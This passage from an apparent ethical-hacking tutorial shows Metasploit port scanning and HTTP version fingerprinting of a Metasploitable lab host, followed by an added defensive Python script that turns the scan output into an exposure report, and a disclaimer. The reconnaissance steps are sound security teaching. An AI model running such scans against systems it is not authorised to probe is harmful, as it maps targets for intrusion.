    msf6 exploit(multi/handler) > hosts
    
    Hosts
    =====
    
    address          mac                 name            os_name  os_flavor  os_sp  purpose  info  comments
    -------          ---                 ----            -------  ---------  -----  -------  ----  --------
    192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                      Server
     
    
    
    msf6 exploit(multi/handler) > 
    




    Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:



    msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > show options
    
    Module options (auxiliary/scanner/portscan/tcp):
    
       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       CONCURRENCY  10               yes       The number of concurrent ports to check per host
       DELAY        0                yes       The delay between connections, per thread, in milliseconds
       JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       THREADS      1                yes       The number of concurrent threads (max one per host)
       TIMEOUT      1000             yes       The socket connect timeout in milliseconds
    
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
    RHOSTS => 192.168.43.0
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
    [*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    
    
    


    Running the port scan module requires us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg command sets the RHOSTS value globally to 192.168.43.120, which saves us from retyping set RHOSTS for every module.

    In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
    msf6 auxiliary(scanner/http/http_version) > show options
    
    Module options (auxiliary/scanner/http/http_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    80               yes       The target port (TCP)
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       THREADS  1                yes       The number of concurrent threads (max one per host)
       VHOST                     no        HTTP server virtual host
    
    msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/http/http_version) > run
    
    [+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/http_version) > 
    
    
    


    Running the auxiliary module, we find that the service on port 80 is the popular Apache 2.2.8 web server. Searching the web, we find that the PHP version 5.2.4 it reports is vulnerable and can allow an attacker to gain access to the target system.
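For the server's owner, the open-port list and the banner above are an attack-surface report. The following Python is an added example (not the post's code): it parses the output formats of auxiliary/scanner/portscan/tcp and auxiliary/scanner/http/http_version and diffs them against a constructed baseline of expected ports and version floors (the baseline and floor values are placeholders, not a recommendation).

```python
import re
from collections import defaultdict

# Constructed excerpts in the formats the two modules print (the lines mirror the page's output)
SCAN_OUTPUT = """\
[+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
[*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
"""
BANNER_LINE = "[+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )"

OPEN_RE = re.compile(r"^\[\+\] \S+\s+- (?P<host>[\d.]+):(?P<port>\d+) - TCP OPEN$")
BANNER_RE = re.compile(r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+) (?P<banner>.+)$")
PRODUCT_RE = re.compile(r"([A-Za-z]+)/(\d+(?:\.\d+)*)")

# Constructed policy (placeholder values): ports the owner expects, and minimum acceptable versions
BASELINE = {"192.168.43.120": {22, 80}}
MIN_VERSION = {"Apache": (2, 4, 0), "PHP": (7, 4, 0)}

def parse_open_ports(text):
    found = defaultdict(set)
    for line in text.splitlines():
        if m := OPEN_RE.match(line):
            found[m["host"]].add(int(m["port"]))
    return {host: sorted(ports) for host, ports in found.items()}

def parse_banner(line):
    """(host, port, {product: version tuple}) from an http_version result line, or None."""
    m = BANNER_RE.match(line)
    if not m:
        return None
    products = {name: tuple(int(x) for x in ver.split("."))
                for name, ver in PRODUCT_RE.findall(m["banner"])}
    return m["host"], int(m["port"]), products

def exposure_report(scan_text, banner_line):
    """Unexpected listeners per host, plus any banner version below the policy floor."""
    report = {}
    for host, ports in parse_open_ports(scan_text).items():
        expected = BASELINE.get(host, set())
        report[host] = {"unexpected_ports": sorted(set(ports) - expected), "outdated": []}
    if parsed := parse_banner(banner_line):
        host, port, products = parsed
        entry = report.setdefault(host, {"unexpected_ports": [], "outdated": []})
        for name, version in products.items():
            floor = MIN_VERSION.get(name)
            if floor and version < floor:
                entry["outdated"].append(f"{name} {'.'.join(map(str, version))} on port {port}")
    return report
```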


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


